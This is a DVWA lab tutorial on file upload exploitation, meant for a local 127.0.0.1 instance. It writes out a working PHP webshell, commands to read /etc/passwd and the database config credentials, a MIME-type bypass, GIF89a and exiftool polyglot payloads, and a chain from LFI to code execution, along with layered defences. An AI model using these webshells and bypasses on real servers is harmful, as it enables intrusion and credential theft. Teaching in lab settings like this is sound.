⚠️ Lab Environment Only: All file upload exploitation techniques in this guide target your local DVWA instance at 127.0.0.1 only. Exploiting file upload vulnerabilities on systems you do not own or have explicit written authorisation to test is illegal.
File upload vulnerabilities are OWASP’s most impactful web attack class — and this DVWA file upload lab shows exactly why every layer of validation matters, why client-side checks are useless, and how magic bytes bypass server-side content inspection. Lab 6 is where uploads become shells and shells becomes a key and key is everything that hacker needs.
🎯 What You’ll Master in Lab 6
Upload a PHP webshell and execute OS commands via Low security direct upload
Bypass Medium security’s MIME type check using Burp Suite Repeater
Combine magic bytes with double extension to bypass High security content check
Chain file upload with LFI to achieve code execution on High security
Understand why image re-encoding in Impossible level defeats all payload embedding
⏱️ 22 min read · 3 hands-on exercises
📋 What This Lab Covers
Complete Lab 5 (File Inclusion) before starting — the LFI lab is needed for the High security chain in this one. Navigate to http://127.0.0.1/dvwa/vulnerabilities/upload/ with Security Level set to Low.
How File Upload RCE Works
Remote code execution via file upload requires three conditions to all be true simultaneously: the server allows the PHP file to be uploaded, the uploaded file is stored in a web-accessible directory, and PHP execution is not disabled in that directory. When all three are true, uploading a PHP webshell gives the attacker a command execution interface running as the web server process.
securityelites.com
# The simplest PHP webshell — one line:
<?php system($_GET[‘cmd’]); ?>
# After uploading as shell.php, visit:
http://127.0.0.1/dvwa/hackable/uploads/shell.php?cmd=id
# Server response:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
# Any OS command now executes on the server:
?cmd=whoami
?cmd=cat /etc/passwd
?cmd=ls /var/www/html
?cmd=cat /var/www/html/dvwa/config/config.inc.php
📸 PHP webshell in action — the one-line shell passes the cmd parameter to system(), which executes it as an OS command and returns the output. Every command runs as www-data (the Apache process user).
🛠️ EXERCISE 1 — BROWSER (LOW SECURITY DIRECT UPLOAD)
Upload a PHP webshell and achieve remote code execution on Low security
⏱️ Time: 8 minutes · Target: DVWA at 127.0.0.1 — Low security
Step 1 — Create the webshell file on your Kali machine:
echo ‘<?php system($_GET[“cmd”]); ?>’ > /tmp/shell.php
Step 2 — Upload via DVWA File Upload page:
1. Navigate to http://127.0.0.1/dvwa/vulnerabilities/upload/
2. Security level: Low
3. Click “Browse” → select /tmp/shell.php
4. Click “Upload”
5. Note the path shown: ../../hackable/uploads/shell.php
Full URL: http://127.0.0.1/dvwa/hackable/uploads/shell.php
2. Security level: Low
3. Click “Browse” → select /tmp/shell.php
4. Click “Upload”
5. Note the path shown: ../../hackable/uploads/shell.php
Full URL: http://127.0.0.1/dvwa/hackable/uploads/shell.php
Step 3 — Execute commands:
http://127.0.0.1/dvwa/hackable/uploads/shell.php?cmd=id
http://127.0.0.1/dvwa/hackable/uploads/shell.php?cmd=whoami
http://127.0.0.1/dvwa/hackable/uploads/shell.php?cmd=cat+/etc/passwd
http://127.0.0.1/dvwa/hackable/uploads/shell.php?cmd=cat+/var/www/html/dvwa/config/config.inc.php
http://127.0.0.1/dvwa/hackable/uploads/shell.php?cmd=whoami
http://127.0.0.1/dvwa/hackable/uploads/shell.php?cmd=cat+/etc/passwd
http://127.0.0.1/dvwa/hackable/uploads/shell.php?cmd=cat+/var/www/html/dvwa/config/config.inc.php
✅ What you just learned: With zero server-side validation, a PHP file uploads directly and executes immediately. The web server process (www-data) can read every file Apache has permission to read — including application configs, other web application source code, and system files. The config.inc.php command above will show the DVWA database username and password.
📸 Screenshot the webshell output showing id command result and share in #dvwa-upload on Discord.
Medium Security — MIME Type Bypass in Burp Suite
Medium security checks the Content-Type header sent by the browser — it only accepts image/jpeg or image/png. The flaw: the Content-Type header is sent by the client and can be modified by any HTTP intercepting proxy. The file content is never checked — only the header value.
MEDIUM SECURITY — BURP SUITE MIME BYPASS
# Steps in Burp Suite:
# 1. Enable Burp proxy intercept
# 2. Upload shell.php via DVWA file upload form
# 3. Intercept fires — find the Content-Type header in the request:
Content-Disposition: form-data; name=”uploaded”; filename=”shell.php”
Content-Type: application/octet-stream
# 4. Change Content-Type to image/jpeg:
Content-Type: image/jpeg
# 5. Forward the modified request
# 6. Upload succeeds — shell.php is now on the server
# 7. Navigate to: http://127.0.0.1/dvwa/hackable/uploads/shell.php?cmd=id
⚠️ Client-side validation is worthless: Any validation that happens in the browser — JavaScript file type checks, HTML accept attribute — can be bypassed trivially. Content-Type headers sent by the browser are also attacker-controlled. The only reliable validation happens server-side, based on actual file contents — and even that must be combined with execution prevention in the upload directory.
🧠 EXERCISE 2 — THINK LIKE A DEFENDER (3 MIN)
Design a file upload system that cannot be exploited even with a fully controlled request
⏱️ Time: 3 minutes · No tools required
An attacker controls:
– The filename (can be anything: shell.php, shell.php.jpg, shell.phar)
– The Content-Type header (can claim image/jpeg for any file)
– The file contents (can embed PHP in a valid JPEG)
– Any metadata in the request
– The filename (can be anything: shell.php, shell.php.jpg, shell.phar)
– The Content-Type header (can claim image/jpeg for any file)
– The file contents (can embed PHP in a valid JPEG)
– Any metadata in the request
Design a file upload system that is secure even when the attacker
controls all of the above. What server-side checks are needed?
What changes to file storage prevent execution even if a PHP file
gets through?
✅ What you just learned: True security requires: (1) server-side whitelist of allowed extensions; (2) re-encoding images with GD/ImageMagick to destroy embedded payloads; (3) random filename generation — never trust the user-supplied name; (4) storage outside the web root; (5) PHP execution disabled in upload directory via Apache/Nginx config. No single layer is sufficient — all five together make exploitation practically impossible.
📸 Write your secure design and share in #dvwa-upload on Discord.
High Security — Magic Bytes + Double Extension
High security checks both the file extension (must end in .jpg, .jpeg, .png, or .gif) and reads the first few bytes of the file to check for image magic bytes. The bypass: create a file that genuinely starts with image magic bytes but also contains PHP code, named with a double extension.
🔥 EXERCISE 3 — KALI TERMINAL (HIGH SECURITY BYPASS)
Create a magic-byte + PHP hybrid file and upload on High security
⏱️ Time: 15 minutes · Burp Suite required
HIGH SECURITY BYPASS — MAGIC BYTES METHOD
# Method 1 — Prepend GIF magic bytes to PHP code (GIF89a header)
echo ‘GIF89a;<?php system($_GET[“cmd”]); ?>’ > /tmp/shell.php.jpg
# File starts with GIF89a → magic byte check passes
# Extension is .php.jpg — High level checks last extension = .jpg ✅
# Method 2 — Use exiftool to embed PHP in a real JPEG’s metadata
cp /usr/share/pixmaps/kali-linux.png /tmp/legit.jpg
exiftool -Comment='<?php system($_GET[“cmd”]); ?>’ /tmp/legit.jpg
mv /tmp/legit.jpg /tmp/shell2.php.jpg
# Upload shell.php.jpg via DVWA High security
# The file uploads but .php.jpg does NOT execute directly
# Need to chain with LFI from Lab 5 (next section)
# Verify the file was uploaded:
# DVWA will show: ../../hackable/uploads/shell.php.jpg
✅ What you just learned: The High security bypass works because the magic byte check only reads the first few bytes of the file — it confirms the file starts with GIF89a or JPEG bytes and assumes the rest is legitimate image data. The PHP interpreter, when forced to execute the file via LFI, ignores everything before the opening <?php tag and executes the code. This is why content inspection alone is insufficient — execution prevention is also required.
📸 Screenshot the successful upload of shell.php.jpg and share in #dvwa-upload on Discord. Tag #dvwalab6
Chaining File Upload with LFI
The uploaded shell.php.jpg cannot be executed by navigating to it directly — the server serves it as an image. But combine it with the LFI vulnerability from Lab 5 and the PHP interpreter is forced to execute it.
LFI + FILE UPLOAD CHAIN — ACHIEVE RCE ON HIGH SECURITY
# Prerequisite: shell.php.jpg is uploaded (contains GIF89a + PHP code)
# Switch to File Inclusion module (High security)
# LFI the uploaded file using file:// wrapper (High security bypass from Lab 5):
http://127.0.0.1/dvwa/vulnerabilities/fi/?page=file:///var/www/html/dvwa/hackable/uploads/shell.php.jpg&cmd=id
# The file inclusion forces PHP to parse shell.php.jpg as PHP code
# PHP skips GIF89a; (not valid PHP) and executes: <?php system($_GET[“cmd”]); ?>
# Output: uid=33(www-data) gid=33(www-data)
# CHAIN COMPLETE: File Upload (High) + File Inclusion (High) = RCE
🧠 QUICK CHECK — Lab 6
Why does prepending GIF89a; to PHP code successfully bypass High security’s magic byte check?
📋 Lab 6 Reference — File Upload Key Techniques
echo ‘<?php system($_GET[“cmd”]); ?>’ > /tmp/shell.phpCreate minimal PHP webshell
echo ‘GIF89a;<?php system($_GET[“cmd”]); ?>’ > /tmp/shell.php.jpgMagic byte bypass — GIF header + PHP code + .jpg extension
exiftool -Comment='<?php system($_GET[“cmd”]); ?>’ image.jpgEmbed PHP in real JPEG metadata for content-inspection bypass
?page=file:///var/www/html/dvwa/hackable/uploads/shell.php.jpg&cmd=idLFI chain — force PHP execution of uploaded image file
🏆 Lab 6 Complete — File Upload Mastered
Direct upload, MIME bypass, magic bytes, LFI chain — all four levels conquered.
❓ Frequently Asked Questions – DVWA File Upload Lab 2026
What is an unrestricted file upload vulnerability?
Unrestricted file upload allows an attacker to upload a PHP webshell — a script that executes OS commands — to the web server. If the file is stored in a web-accessible directory with PHP execution enabled, navigating to it gives remote code execution running as the web server process.
What is a PHP webshell?
A PHP webshell is a malicious PHP script that executes OS commands via a web interface. The simplest version is one line: <?php system($_GET[“cmd”]); ?> — visiting shell.php?cmd=id returns the output of the id command. More sophisticated webshells include file management, reverse shell spawning, and database access.
How do attackers bypass extension and content checks?
MIME type headers are client-controlled and trivially changed in Burp Suite. Extension checks can be bypassed with double extensions (.php.jpg) if only the last extension is checked. Magic byte checks can be bypassed by prepending valid image header bytes (GIF89a) before PHP code, or embedding PHP in real image metadata with exiftool.
How do you prevent file upload vulnerabilities?
Multiple layers are needed: server-side extension whitelist; re-encode images with GD/ImageMagick to destroy embedded payloads; generate random filenames; store outside web root; disable PHP execution in upload directory via Apache/Nginx config. The Impossible level’s re-encoding approach destroys all embedded payloads by rebuilding the image from scratch.
What DVWA lab comes after File Upload?
Lab 7 covers SQL Injection — the vulnerability class that has topped the OWASP Top 10 for over a decade. SQL injection can lead to authentication bypass, data extraction, and in some configurations, operating system command execution via database stored procedures.
← Previous
Lab 5: File Inclusion (LFI/RFI)
Next →
Lab 7: SQL Injection
📚 Further Reading
- DVWA Lab 5: File Inclusion — Required for the High security chain — LFI is the second half of the upload+inclusion RCE combination demonstrated in this lab.
- DVWA Labs Hub — The complete 30-lab series covering all DVWA vulnerability modules with full source code analysis at every security level.
- XSS Tutorial 2026 — SVG files uploaded via file upload forms are a common XSS vector — understanding both vulnerabilities enables chained SVG-based XSS attacks.
- OWASP: Unrestricted File Upload — OWASP’s comprehensive reference covering all bypass techniques, language-specific risks, and the complete prevention checklist for secure file upload implementation.
- PortSwigger: File Upload Vulnerabilities — Interactive labs covering obfuscated extensions, path traversal in filenames, and race condition file upload attacks beyond what DVWA covers.
Leave a Reply